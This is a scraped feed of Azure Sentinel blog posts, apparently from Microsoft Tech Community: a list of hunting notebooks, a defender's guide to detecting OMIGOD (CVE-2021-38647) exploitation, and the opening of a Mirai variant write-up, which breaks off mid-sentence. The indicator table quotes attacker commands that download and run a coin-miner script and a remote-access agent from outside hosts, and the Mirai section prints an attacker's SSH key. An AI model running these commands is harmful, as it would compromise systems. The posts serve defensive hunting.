</TD> <TD width="316.094px" height="138px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> OfficeActivity</P> <P>&nbsp;</P> <P><STRONG>Package(s):&nbsp;</STRONG> <SPAN>msticpy, pandas, kqlmagic</SPAN></P> </TD> </TR> <TR> <TD width="157.906px" height="192px" style="vertical-align: top; width: 200px;"> <P><A href="#" target="_blank" rel="noopener"><STRONG>Guided Hunting - Base64-Encoded Linux Commands</STRONG>&nbsp;</A></P> </TD> <TD width="216.328px" height="192px" style="vertical-align: top; width: 100px;"> <P>Hunting</P> </TD> <TD width="432.672px" height="192px" style="vertical-align: top; width: 450px;"> <P>This notebook is a collection of tools for detecting malicious behavior when commands are Base64-encoded. It allows you to specify a workspace and time frame and will score and rank Base64 commands within those bounds. It utilizes multiple data sources, primarily focusing on Azure Sentinel Syslog data augmented by telemetry from the MSTIC research branch of the AUOMS audit collection tool.</P> </TD> <TD width="316.094px" height="192px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> Syslog, Auditd_CL, SecurityAlert, AzureNetworkAnalytics_CL</P> <P>&nbsp;</P> <P><STRONG>Package(s):&nbsp;</STRONG> kqlmagic, msticpy, pandas, numpy, matplotlib, networkx, seaborn, datetime, ipywidgets, ipython, dnspython, folium, maxminddb_geolite2, BeautifulSoup</P> </TD> </TR> <TR> <TD width="157.906px" height="165px" style="vertical-align: top; width: 200px;"> <P><STRONG>Guided Hunting – Covid-19 Themed Threats</STRONG></P> </TD> <TD width="216.328px" height="165px" style="vertical-align: top; width: 100px;"> <P>Hunting</P> </TD> <TD width="432.672px" height="165px" style="vertical-align: top; width: 450px;"> <P>Brings together a number of techniques and approaches to allow an analyst to hunt for indicators of Covid-19 themed threats within an organization's data. This includes hunting templates for network, cloud and host logs in order to find potentially malicious Covid-19 themed activity.</P> </TD> <TD width="316.094px" height="165px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> SecurityEvent, OfficeActivity, CommonSecurityLog</P> <P>&nbsp;</P> <P><STRONG>Package(s):&nbsp; </STRONG>MSTICPy</P> </TD> </TR> <TR> <TD width="157.906px" height="219px" style="vertical-align: top; width: 200px;"> <P><STRONG>Guided Investigation - Anomaly Lookup</STRONG></P> </TD> <TD width="216.328px" height="219px" style="vertical-align: top; width: 100px;"> <P>Investigation</P> </TD> <TD width="432.672px" height="219px" style="vertical-align: top; width: 450px;"> <P>Gain insights into the possible root cause of an alert by searching for related anomalies on the corresponding entities around the alert’s time. This notebook will provide valuable leads for an alert’s investigation, listing all suspicious increase in event counts or their properties around the time of the alert, and linking to the corresponding raw records in Log Analytics for the investigator to focus on and interpret.</P> </TD> <TD width="316.094px" height="219px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> SecurityEvent, SecurityAlert, AzureNetworkAnalytics_CL, Auditd_CL, OfficeActivity, CommonSecurityLog</P> <P>&nbsp;</P> <P><STRONG>Package(s):&nbsp; </STRONG>MSTICPy</P> </TD> </TR> <TR> <TD width="157.906px" height="138px" style="vertical-align: top; width: 200px;"> <P><STRONG>Guided Investigation - Process Alerts</STRONG></P> </TD> <TD width="216.328px" height="138px" style="vertical-align: top; width: 100px;"> <P>Investigation</P> </TD> <TD width="432.672px" height="138px" style="vertical-align: top; width: 450px;"> <P>This notebook is intended for triage and investigation of security alerts. It is specifically targeted at alerts triggered by suspicious process activity on Windows hosts. Some of the sections will work on other types of alerts but this is not guaranteed.</P> </TD> <TD width="316.094px" height="138px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> SecurityEvent</P> <P>&nbsp;</P> <P><STRONG>External service(s):</STRONG> OTX, VirusTotal, XForce</P> </TD> </TR> <TR> <TD width="157.906px" height="111px" style="vertical-align: top; width: 200px;"> <P><STRONG>Guided Investigation - SolarWinds Post</STRONG></P> </TD> <TD width="216.328px" height="111px" style="vertical-align: top; width: 100px;"> <P>Investigation</P> </TD> <TD width="432.672px" height="111px" style="vertical-align: top; width: 450px;"> <P>This notebook assists defenders in hunting for SolarWinds post compromise Tactics , Tools and Procedures (TTPs) across different environments both on-premises and cloud data sources.</P> </TD> <TD width="316.094px" height="111px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> SecurityEvent, AuditLogs, SigninLogs, OfficeActivity</P> <P>&nbsp;</P> <P><STRONG>External service(s):</STRONG> OTX, VirusTotal, XForce</P> </TD> </TR> <TR> <TD width="157.906px" height="219px" style="vertical-align: top; width: 200px;"> <P><STRONG>Guided Investigation – Alert Triage</STRONG></P> </TD> <TD width="216.328px" height="219px" style="vertical-align: top; width: 100px;"> <P>Investigation</P> </TD> <TD width="432.672px" height="219px" style="vertical-align: top; width: 450px;"> <P>Rapidly triage alerts raised by a range of sources (Azure Sentinel, MDE, MCAS, ASC, etc.) by enriching alert data with Threat Intelligence and OSINT. This notebook is intended to be used by analysts as part of a standard operating procedure. The notebook uses UI widgets and simple workflow to ensure an easy introduction to notebooks for all levels of analyst levels. This Notebook uses MSTICpy to connect to Threat Intelligence sources</P> </TD> <TD width="316.094px" height="219px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> SecurityAlert</P> <P>&nbsp;</P> <P><STRONG>Package(s):&nbsp;</STRONG> MSTICPy</P> </TD> </TR> <TR> <TD width="157.906px" height="138px" style="vertical-align: top; width: 200px;"> <P><STRONG>Guided Web Shell Investigation - MDE Sentinel Enrichments</STRONG></P> </TD> <TD width="216.328px" height="138px" style="vertical-align: top; width: 100px;"> <P>Investigation</P> </TD> <TD width="432.672px" height="138px" style="vertical-align: top; width: 450px;"> <P>This notebook investigates Microsoft Defender for Endpoint (MDE) web shell alerts. The notebook will guide you through steps to collect MDE alerts for web shell activity and link them to server access logs to identify potential attackers.</P> </TD> <TD width="316.094px" height="138px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> SecurityAlert, W3CIISLog</P> <P>&nbsp;</P> <P><STRONG>Package(s):&nbsp;</STRONG> MSTICPy</P> </TD> </TR> <TR> <TD width="157.906px" height="84px" style="vertical-align: top; width: 200px;"> <P><STRONG>Hands on - Data Discovery using Azure REST API</STRONG></P> </TD> <TD width="216.328px" height="84px" style="vertical-align: top; width: 100px;"> <P>Getting Started</P> </TD> <TD width="432.672px" height="84px" style="vertical-align: top; width: 450px;"> <P>This notebook will provide step-by-step instructions and sample code to guide you through Azure authentication, Sentinel data discovery by using Azure REST API.</P> </TD> <TD width="316.094px" height="84px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> SecurityEvent</P> </TD> </TR> <TR> <TD width="157.906px" height="111px" style="vertical-align: top; width: 200px;"> <P><STRONG>Hands on - Surfing Your Data using Azure SDK for Python</STRONG></P> </TD> <TD width="216.328px" height="111px" style="vertical-align: top; width: 100px;"> <P>Getting Started</P> </TD> <TD width="432.672px" height="111px" style="vertical-align: top; width: 450px;"> <P>This notebook will provide step-by-step instructions and sample code to guide you through Azure authentication, Sentinel log data discovery by using Azure SDK for Python and Kusto Query Language (KQL).</P> </TD> <TD width="316.094px" height="111px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> SecurityEvent</P> </TD> </TR> <TR> <TD width="157.906px" height="111px" style="vertical-align: top; width: 200px;"> <P><STRONG>Machine Learning in Notebooks Examples</STRONG></P> </TD> <TD width="216.328px" height="111px" style="vertical-align: top; width: 100px;"> <P>Getting Started</P> </TD> <TD width="432.672px" height="111px" style="vertical-align: top; width: 450px;"> <P>This notebook template guides you through using time series analysis to detect anomalous network activity, clustering to highlight unusual logon sessions, and using Markov Chain to identify anomalous sequences in events.</P> </TD> <TD width="316.094px" height="111px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> SecurityEvent</P> <P>&nbsp;</P> <P><STRONG>Package(s):&nbsp;</STRONG> MSTICPy</P> </TD> </TR> </TBODY> </TABLE> </CENTER> <P>&nbsp;</P> <P>These notebooks and more also exist in the official <A href="#" target="_blank" rel="noopener">Azure Sentinel GitHub repository</A>.&nbsp; This repository contains notebooks contributed by Microsoft and the community to assist hunting and investigation tasks in Azure Sentinel. There are a number of notebooks in the GitHub repository that are valuable additions, but are not supplied automatically when you stand-up Azure Sentinel. You should regularly review this repository for more, or use the RSS feed to be notified of additions and changes.</P> <P>&nbsp;</P> <P>Notebooks, like all other components and features for Azure Sentinel, are under constant review and undergoing constant improvement. Improvements and changes come from feedback and suggestions from our customers. You can use the DL (<STRONG>asinotebooks@service.microsoft.com</STRONG>) to send your questions, issues, and feedback and our various product teams will monitor and respond.</P> <P>&nbsp;</P> <P>As these updates are made available, we’ll update the Grand List.</P> <P>&nbsp;</P> <P>We are super-excited to be bringing this blog series and the training&nbsp;to you! To register, visit <A href="#" target="_blank" rel="noopener">https://aka.ms/SecurityWebinars,</A> look for <STRONG>Azure Sentinel | Become a Notebooks ninja</STRONG> webinar and fill out the registration form.</P> <P>&nbsp;</P> <P>Look for more great knowledge on Azure Sentinel Notebooks as we prepare to deliver Part 4 of this series: How to create your own notebooks from scratch and how to customize the existing ones.</P> <P>&nbsp;</P> <P><STRONG>More reading/tutorial resources:</STRONG></P> <P>&nbsp;</P> <UL> <LI><A href="#" target="_blank" rel="noopener">Notebooks at the Azure Sentinel GitHub Repository</A></LI> <LI><A href="#" target="_blank" rel="noopener">Use Jupyter Notebook to hunt for security threats</A></LI> <LI><A href="#" target="_self">Detect Credential Leaks using Azure Sentinel Notebooks! (video)</A></LI> <LI><A href="#" target="_self">Azure Sentinel: Notebooks - Getting Started (video)</A></LI> <LI><A href="#" target="_self">Detect Malicious Base64-Encoded Commands on Linux Hosts (video)</A></LI> <LI><A href="#" target="_blank" rel="noopener">Azure Sentinel Weekly Newsletter</A></LI> </UL> <P>&nbsp;</P> Tue, 05 Oct 2021 11:59:09 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-notebooks-ninja-part-3-overview-of-the-pre-built/ba-p/2768838 rodtrent 2021-10-05T11:59:09Z Hunting for OMI Vulnerability Exploitation with Azure Sentinel https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093 <P><EM>Russell McDonald, Roberto Rodriguez, and Ajeet Prakash</EM></P> <P><EM>Special thanks to: Ross Bevington&nbsp;</EM></P> <P>&nbsp;</P> <P>Following the September 14<SUP>th</SUP>, 2021 release of three Elevation of Privilege (EoP) vulnerabilities (<A href="#" target="_blank" rel="noopener">CVE-2021-38645</A>, <A href="#" target="_blank" rel="noopener">CVE-2021-38649</A>, <A href="#" target="_blank" rel="noopener">CVE-2021-38648</A>) and one unauthenticated Remote Code Execution (RCE) vulnerability (<A href="#" target="_blank" rel="noopener">CVE-2021-38647</A>) in the Open Management Infrastructure (OMI) Framework, analysts in the Microsoft Threat Intelligence Center (MSTIC) have been monitoring for signs of exploitation and investigating detections to further protect customers. Following the <A href="#" target="_self">MSRC guidance</A> to block ports that you aren't using and to ensure the OMI service is patched are great first steps. In this blog, we have some things to share about current attacks in the wild, agents and software involved, indicators for defenders to look for on host machines, and to share new detections in Azure Sentinel.</P> <P>&nbsp;</P> <H2><FONT size="6"><SPAN>Attacks in the wild</SPAN></FONT></H2> <P>At Microsoft we monitor for attacks against our cloud services to inform our future security research, track emerging threats, and to improve the detection coverage of our security offerings.&nbsp; As part of that work, MSTIC is monitoring for exploitation of the OMI related RCE (CVE-2021-38647).&nbsp; To date we have seen several active exploitation attempts ranging from basic host enumeration (running <EM>uname</EM>, <EM>id</EM>, <EM>ps</EM> commands) to attempts to install a crypto currency miner or file share. (Details available below in Hunting cues section). We have also seen others in the community report similar behavior to include installs of the Mirai botnet. While many of the attackers are looking for port 5986, we are also seeing attacks on port 1270.&nbsp; Due to the number of easily adaptable proof of concept exploits available and the volume of reconnaissance-type attacks, we are anticipating an increase in the number of effects-type attacks (coin miners, bot installation, etc.).</P> <P>&nbsp;</P> <H1>What is OMI?</H1> <P>OMI is an open-source project to further the development of a production quality implementation of the OMI CIMOM is also designed to be portable and highly modular. In order to attain its small footprint, it is coded in C, which also makes it a much more viable CIM Object Manager for embedded systems and other infrastructure components that have memory constraints for their management processor. OMI is also designed to be inherently portable. It builds and runs today on most UNIX® systems and Linux. In addition to OMI's small footprint, it also demonstrates very high performance.</P> <P>&nbsp;</P> <H1>Unauthenticated remote command execution?</H1> <P>In a nutshell, anyone with access to an endpoint running a vulnerable version (less than 1.6.8.1) of the OMI agent can execute arbitrary commands over an HTTP request without an authorization header. The expected behavior would be a 401 unauthorized response. However, the user is able to execute commands with root privileges.</P> <P>More details are available in the <A href="#" target="_blank" rel="noopener">MSRC CVE-2021-38647</A> post and the finder company <A href="#" target="_blank" rel="noopener">Wiz blog post.</A></P> <P>&nbsp;</P> <H1>Endpoint Execution Context</H1> <P>In addition to monitoring for incoming connections over ports 5986, 5985 or 1270 to vulnerable systems, there is more to explore at the endpoint level.</P> <P>&nbsp;</P> <H2>SCXCore Providers</H2> <P>SCXcore, started as the <A href="#" target="_blank" rel="noopener">Microsoft Operations Manager</A> UNIX/Linux Agent, is now used in a host of products including <A href="#" target="_blank" rel="noopener">Microsoft Operations Manager</A>. <A href="#" target="_blank" rel="noopener">Microsoft Azure</A>, and <A href="#" target="_blank" rel="noopener">Microsoft Operations Management Suite</A>.</P> <P>The SCXcore provides a CIMOM provider, based on <A href="#" target="_blank" rel="noopener">OMI</A>, to return logging and statistical information for a UNIX or Linux system. There are several providers or classes available through the SCXcore provider which can be used to gather information from an endpoint such as&nbsp; MemoryStatisticalInformation or FileSystemStatisticalInformation.</P> <P>&nbsp;</P> <P>In addition, there is one support provider named the <STRONG>RunAsProvider</STRONG> which provides the following classes:</P> <UL> <LI>ExecuteCommand: Executes any UNIX/Linux native command</LI> <LI>ExecuteShellCommand: Executes any UNIX/Linux command using the /bin/sh shell</LI> <LI>ExecuteScript: Executes any UNIX/Linux script using the /bin/sh shell</LI> </UL> <P>&nbsp;</P> <H2>Executing Code via ExecuteShellCommand</H2> <P><STRONG>Based on the initial research</STRONG> from Wiz, the following command was used to explore network traffic in order to craft an HTTP request to test the vulnerability:</P> <TABLE border="1" width="100%"> <TBODY> <TR> <TD width="100%">/opt/omi/bin/omicli --hostname 192.168.1.1 -u azureuser -p Password1 iv root/scx { SCX_OperatingSystem } ExecuteShellCommand { command 'id' timeout 0 }</TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <P><STRONG>During testing</STRONG>, we used the <A href="#" target="_blank" rel="noopener">Scxadmin tool</A>, available as part of SCX, to increase all logging to VERBOSE and identify additional sources of data. The following command was used:</P> <TABLE border="1" width="100%"> <TBODY> <TR> <TD width="100%">/opt/microsoft/scx/bin/tools/scxadmin -log-set all verbose</TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <P><STRONG>After running public proof-of-concepts</STRONG> to test the vulnerability, we validated that the code was being handled by the RunAsProvider :: Invoke_ExecuteShellCommand class:<span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="russmc_0-1632000577051.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311328i401E61FCF1859FDD/image-size/large?v=v2&amp;px=999" role="button" title="russmc_0-1632000577051.png" alt="russmc_0-1632000577051.png" /></span></P> <P><STRONG>Checking logs</STRONG> from auditd via Syslog, we also identified where the code was being executed from:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="russmc_1-1632000577059.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311327i200EDE10FF52D3E9/image-size/large?v=v2&amp;px=999" role="button" title="russmc_1-1632000577059.png" alt="russmc_1-1632000577059.png" /></span></P> <P><STRONG>We tested</STRONG> the same in our lab environments, and we observed the same behavior which is shown below:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="russmc_2-1632000577065.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311326i5EFD48793B0893FF/image-size/large?v=v2&amp;px=999" role="button" title="russmc_2-1632000577065.png" alt="russmc_2-1632000577065.png" /></span></P> <P>&nbsp;</P> <P><STRONG>Looking at the code</STRONG> behind the components of the RunAs providers, there are some references to it:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="russmc_3-1632000577069.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311329iEE7CAA9FEA650BA9/image-size/large?v=v2&amp;px=999" role="button" title="russmc_3-1632000577069.png" alt="russmc_3-1632000577069.png" /></span></P> <P>&nbsp;</P> <P><STRONG>More information</STRONG> about SCXcore is available here:&nbsp;<A href="#" target="_blank" rel="noopener">GitHub - microsoft/SCXcore: System Center Cross Platform Provider for Operations Manager</A></P> <P>&nbsp;</P> <H2>Executing Code via ExecuteScript</H2> <P>&nbsp;</P> <P>Similarly, scripts can be run using the ExecuteScript provider. In this case, the body of the http request contains a reference to ExecuteScript.&nbsp; In the below example, the command ‘id’ is base64 encoded to ‘aWQ=’:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="russmc_4-1632000577071.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311330i59B13BB9FE16FBD0/image-size/large?v=v2&amp;px=999" role="button" title="russmc_4-1632000577071.png" alt="russmc_4-1632000577071.png" /></span></P> <P>&nbsp;</P> <P>In this case, the script is passed into a temp directory which you can see in the execve logs. Look for a commandline similar to <EM>/bin/sh /etc/opt/microsoft/scx/conf/tmpdir/scx*</EM>. This command will still show as being run from the same <EM>/var/opt/microsoft/scx/tmp</EM> current working directory.</P> <P>Of note, this is the method we have seen used with attackers attempting to install coin miners.</P> <P>&nbsp;</P> <P><FONT size="6">Azure Sentinel coverage</FONT></P> <P>Relevant security data required for understanding the impact of an attack is produced in multiple locations. Azure Sentinel has made it easy to collect the data from multiple data sources easily. This section of the post contains guidance and generic approaches to look for the OMI related activity in various data feeds that are available by default in Azure Sentinel or can be onboarded to Azure Sentinel.</P> <P>&nbsp;</P> <P>Some Azure products, such as Configuration Management, open an HTTP/S port (1270/5985/5986) listening for OMI. Attackers can exploit the vulnerability in OMI where these ports are open by sending a specially crafted message via HTTPS to port listening to OMI to gain initial access to the machine.</P> <P>&nbsp;</P> <P>The Azure Sentinel query linked below tries to identify connection attempts from the external IP addresses to the OMI management ports (5985,5986,1270). The query primarily leverages the Network Session normalization schema (imNetworkSession)&nbsp; as well as a few other logs to look for this network connection activity from an external IP address. Where available, it tries to restrict the results to the relevant OMI process. The results can sometimes be noisy; hence the query has been shipped as a hunting query.</P> <P>Normalizing parsers for leveraging the imNetworkSession normalized schema are required for this query to work and can be deployed in a click using an <A href="#" target="_blank" rel="noopener">ARM Template</A>.</P> <TABLE border="1" width="100%"> <TBODY> <TR> <TD width="100%"><A href="#" target="_blank" rel="noopener">Azure-Sentinel/NetworkConnectiontoOMIPorts.yaml at master · Azure/Azure-Sentinel · GitHub</A></TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <P>Customers can also use Heartbeat logs that monitors agent health to find vulnerable machine. The Azure Sentinel query linked below tries to leverage Heartbeat data to find OMS-agents that are reporting to the Azure Sentinel workspace but are not updated to the latest version that prevents this vulnerability.</P> <P><FONT size="2" color="#993300">[updated Sept 27, 2021]</FONT></P> <TABLE border="1" width="100%"> <TBODY> <TR> <TD width="100%"><A href="#" target="_blank" rel="noopener">Azure-Sentinel/OMI_vulnerability_detection.yaml at master · Azure/Azure-Sentinel (github.com)</A></TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <P>Additionally, Azure Security Center generates detailed security recommendations if there are vulnerable machines in an Azure Environment with OMI installed. With the <A href="#" target="_blank" rel="noopener">continuous export feature</A> of Security Center, these security recommendations can be imported into Azure Sentinel. Azure Sentinel leverages this data populated in Security Nested Recommendations table to build a detection query to show vulnerable machines.</P> <TABLE border="1" width="100%"> <TBODY> <TR> <TD width="100%">&nbsp;<A href="#" target="_blank" rel="noopener">Azure-Sentinel/OMIGODVulnerableMachines.yaml at master · Azure/Azure-Sentinel · GitHub</A></TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <P>Azure Service Health has also sent notifications to potentially impacted customers. In the impacted environments where customers can run a quick query to check if they are impacted by this Vulnerability.</P> <TABLE border="1" width="100%"> <TBODY> <TR> <TD width="100%"> <P><EM>AzureActivity<BR />| where CategoryValue == 'ServiceHealth'<BR />| where isnotempty(Properties) and Properties has 'CVE-2021-38645'<BR />| extend defaultLanguageTitle = tostring(parse_json(tostring(parse_json(Properties).eventProperties)).defaultLanguageTitle)</EM></P> </TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <H1>SCX RunAs Provider</H1> <P><FONT size="2" color="#993300">[updated Sept 24, 2021]</FONT></P> <P>The below hunting query uses security events from the Microsoft Audit Collection Tool (AUOMS) collected via the Azure Sentinel Syslog <A href="#" target="_self">data connector</A> to explore the use of SCX Execute RunAs providers.</P> <P>&nbsp;</P> <TABLE border="1" width="100%"> <TBODY> <TR> <TD width="100%"> <P><A href="#" target="_blank" rel="noopener">Azure-Sentinel/SCXExecuteRunAsProviders.yml at master · Azure/Azure-Sentinel (github.com)</A></P> </TD> </TR> </TBODY> </TABLE> <P><BR />Execute RunAs providers such as the ExecuteShellCommand and ExecuteScript can be used to execute any UNIX/Linux command and script respectively using the /bin/sh shell. Execution occurs from the /var/opt/microsoft/scx/tmp directory and depending on the execution RunAs provider, execution can be a command or a script. If the ExecuteScript RunAs provider is used, then the script file is created in the following directory /bin/sh /etc/opt/microsoft/scx/conf/tmpdir/ with the prefix scx (e.g. scxzOy96). SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite.</P> <P>&nbsp;</P> <P><FONT size="6">Hunting cues and IOCs</FONT></P> <TABLE> <TBODY> <TR> <TD width="189"> <P>Common enumeration commands seen</P> </TD> <TD width="435"> <P>uname -a, id, netstat, ps</P> </TD> </TR> <TR> <TD width="189"> <P>Exploitation attempt</P> </TD> <TD width="435"> <P data-unlink="true">wget hxxps://www.dwservice.net/download/dwagent_generic.sh&nbsp; -O dwagent_generic.sh</P> </TD> </TR> <TR> <TD width="189"> <P>Exploitation attempt</P> </TD> <TD width="435"> <P data-unlink="true">echo curl hxxps://www.dwservice.net/download/dwagent_generic.sh&nbsp; --output dw.sh &gt; go.sh</P> </TD> </TR> <TR> <TD width="189"> <P>Exploitation attempt</P> </TD> <TD width="435"> <P>curl -fSsL hxxp://104.168.213.31:55879/coinlinux/runMiner.sh</P> </TD> </TR> <TR> <TD width="189"> <P>Scanning IPs</P> </TD> <TD width="435"> <P>13.212.235.12</P> </TD> </TR> <TR> <TD width="189"> <P>Scanning IPs</P> </TD> <TD width="435"> <P>142.93.148.12</P> </TD> </TR> <TR> <TD width="189"> <P>Scanning IPs</P> </TD> <TD width="435"> <P>171.224.80.216</P> </TD> </TR> <TR> <TD width="189"> <P>Scanning IPs</P> </TD> <TD width="435"> <P>185.220.100.245</P> </TD> </TR> <TR> <TD width="189"> <P>Scanning IPs</P> </TD> <TD width="435"> <P>216.151.191.152</P> </TD> </TR> <TR> <TD width="189"> <P>Scanning IPs</P> </TD> <TD width="435"> <P>23.129.64.140</P> </TD> </TR> <TR> <TD width="189"> <P>Scanning IPs</P> </TD> <TD width="435"> <P>31.44.185.115</P> </TD> </TR> <TR> <TD width="189"> <P>Scanning IPs</P> </TD> <TD width="435"> <P>46.30.42.126</P> </TD> </TR> <TR> <TD width="189"> <P>Scanning IPs</P> </TD> <TD width="435"> <P>5.45.127.209</P> </TD> </TR> <TR> <TD width="189"> <P>Scanning IPs</P> </TD> <TD width="435"> <P>94.198.42.158</P> </TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <P><FONT size="6">References:&nbsp;</FONT></P> <P><STRONG>MSRC communications:</STRONG></P> <UL> <LI><A href="#" target="_blank" rel="noopener">CVE-2021-38647 - Security Update Guide - Microsoft - Open Management Infrastructure Remote Code Execution Vulnerability</A></LI> <LI><A href="#" target="_blank" rel="noopener">Additional Guidance Regarding OMI Vulnerabilities within Azure VM Management Extensions – Microsoft Security Response Center</A></LI> </UL> <P><STRONG>Azure Security Center Guidance:</STRONG></P> <UL> <LI><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-security-center/using-asc-to-find-machines-affected-by-omi-vulnerabilities-in/ba-p/2767240" target="_blank" rel="noopener">Using ASC to find&nbsp;machines affected by OMI vulnerabilities in Azure VM Management Extensions - Microsoft Tech Community</A></LI> </UL> <P><STRONG>Sentinel Detections:</STRONG></P> <UL> <LI><A href="#" target="_blank" rel="noopener">Azure-Sentinel/NetworkConnectiontoOMIPorts.yaml at master · Azure/Azure-Sentinel · GitHub</A></LI> <LI><A href="#" target="_blank" rel="noopener">Azure-Sentinel/OMIGODVulnerableMachines.yaml at master · Azure/Azure-Sentinel · GitHub</A></LI> <LI><A href="#" target="_blank" rel="noopener">Azure-Sentinel/SCXExecuteRunAsProviders.yml at master · Azure/Azure-Sentinel (github.com)</A>&nbsp;<FONT size="2" color="#993300">[updated Sept 24, 2021]</FONT></LI> </UL> <P><STRONG>Software and tools:</STRONG></P> <UL> <LI><A href="#" target="_blank" rel="noopener">GitHub - microsoft/SCXcore: System Center Cross Platform Provider for Operations Manager</A></LI> <LI><A href="#" target="_blank" rel="noopener">GitHub - microsoft/Build-omi: Build projects required for OMI (Open Management Infrastructure)</A></LI> </UL> <H3>Research lab environments:</H3> <UL> <LI><A href="#" target="_blank" rel="noopener">Azure-Sentinel2Go/grocery-list/Linux/demos/CVE-2021-38647-OMI at master · OTRF/Azure-Sentinel2Go (github.com)</A></LI> </UL> <P>&nbsp;</P> <P><STRONG>Public Discussion About Attacks in the wild:</STRONG></P> <UL> <LI><A href="#" target="_blank" rel="noopener">chris doman on Twitter: ":loudspeaker:</img>OMIGOD (CVE-2021-38647) is now under active exploitation :loudspeaker:</img> We took at a look at one of the first samples - yup, it's Mirai! If you're running Linux on Azure, check to see if OMI is installed https://t.co/o3nr82RgH1 https://t.co/kbbt1T52d3" / Twitter</A></LI> <LI><A href="#" target="_blank" rel="noopener">Andrew Morris on Twitter: "The Azure "OHMIGOD" vulnerability (CVE-2021-38647) is increasing a good bit. ~10 IPs opportunistically exploiting the vuln across the internet this morning, ~80 now. Tags available to all GN users and customers now. GNQL: cve:CVE-2021-38647 https://t.co/sbdxJxzrEd https://t.co/7dyU213Pl1" / Twitter</A></LI> <LI><A href="#" target="_blank" rel="noopener">Kevin Beaumont on Twitter: "Oh Mirai fixed their binary, it now supports proper OMIGOD exploitation. Given Mirai can enter networks and spread laterally via multiple vulns, this might be problematic. https://t.co/8nXSEcMHYa" / Twitter</A></LI> </UL> <P>&nbsp;</P> Mon, 27 Sep 2021 20:22:26 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093 russmc 2021-09-27T20:22:26Z Unusual MIRAI variant looks for mining infrastructure https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/unusual-mirai-variant-looks-for-mining-infrastructure/ba-p/2756669 <P>At Microsoft the data from attacks that we see against our cloud services informs our security research and investments. Microsoft uses this data, and other sources, to track emerging threats as well as to improve the detection coverage of our security offerings. The results of this benefits customers through products such as Azure Defender and Azure Sentinel.</P> <P>&nbsp;</P> <P data-unlink="true">Microsoft works with a range of partners including academia to develop new ways of analysing and exploring big data sets. We’ve even <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/enabling-security-research-amp-hunting-with-open-source-iot/ba-p/1279037" target="_self">released large dumps of this kind of data</A> in the past to help other security researchers not affiliated with Microsoft.&nbsp;This year Microsoft has worked with MSc student Philip Thiede, supervised by Francesco Sanna Passino and Nick Heard at Imperial College. Where they have been developing innovative clustering approaches to explore this data for Philip's MSc thesis.</P> <P>&nbsp;</P> <P>By clustering the data, we hoped to find similar groups and outliers. Early results of this process discovered an unusual MIRAI variant which looks to take over existing, perhaps legitimate, coin miner infrastructure. Historically we have seen extremely very low levels of compromises from this bot, but a little searching reveals it <A href="#" target="_blank" rel="noopener">was first spotted in 2017</A>. It now seems to be trying to make a comeback.</P> <P>&nbsp;</P> <H2>The variant</H2> <P>MIRAI is a botnet usually seen brute forcing credentials for IoT and IoT like devices and is mainly focused on protocols like SSH and Telnet. The bot in question which we’ve named MinerFinder starts by dropping an SSH key. This can be used to later gain access to the infected system in case the password is reset.</P> <P>&nbsp;</P> <P>If you have this SSH key in your authorized_keys file then you’ve been compromised.</P> <PRE>AAAAB3NzaC1yc2EAAAADAQABAAABAQC6apTpBLxylca9D2EVjfr8xa6OadS2c0oR4RYLkJiIp2XoWkJKqxVodz0s2gfQrMb9qr3oJQVoT4M1WHd829D5Wu2kJY4RMFSo+Rb2dszg0PQJ5Ug1pEW1DedYR379sjoIiF/qbaDzq3FtkUx9+5E/BiqdMGyncml3yinN6HuNH+Fnhv6TtS45Re6gI1rA21qFguBF5U3yPFKeF5ElH997x/0rf3Qr01v38F2994IEXZ3fiaZTkw7k/ul9CnuCuIlCkPGeO7xkpR/70sU077scxbArlCe/ch5BSBK9u8nOCBUBV7AlgZ9RojfTp/wbqqg20zfB7pwEaaMI25zP5QsF</PRE> <P>Next, in typical MIRAI style, a command to be executed is wrapped in a magic constant that allows later parsing to be slightly easier. Here’s an example:</P> <PRE>echo '&lt;cmd7uname&gt;'; uname -a ; echo '&lt;/cmd7uname&gt;</PRE> <P>Most MIRAI bots have a static constant which tends to give the variant its name. What’s interesting about this bot is that it 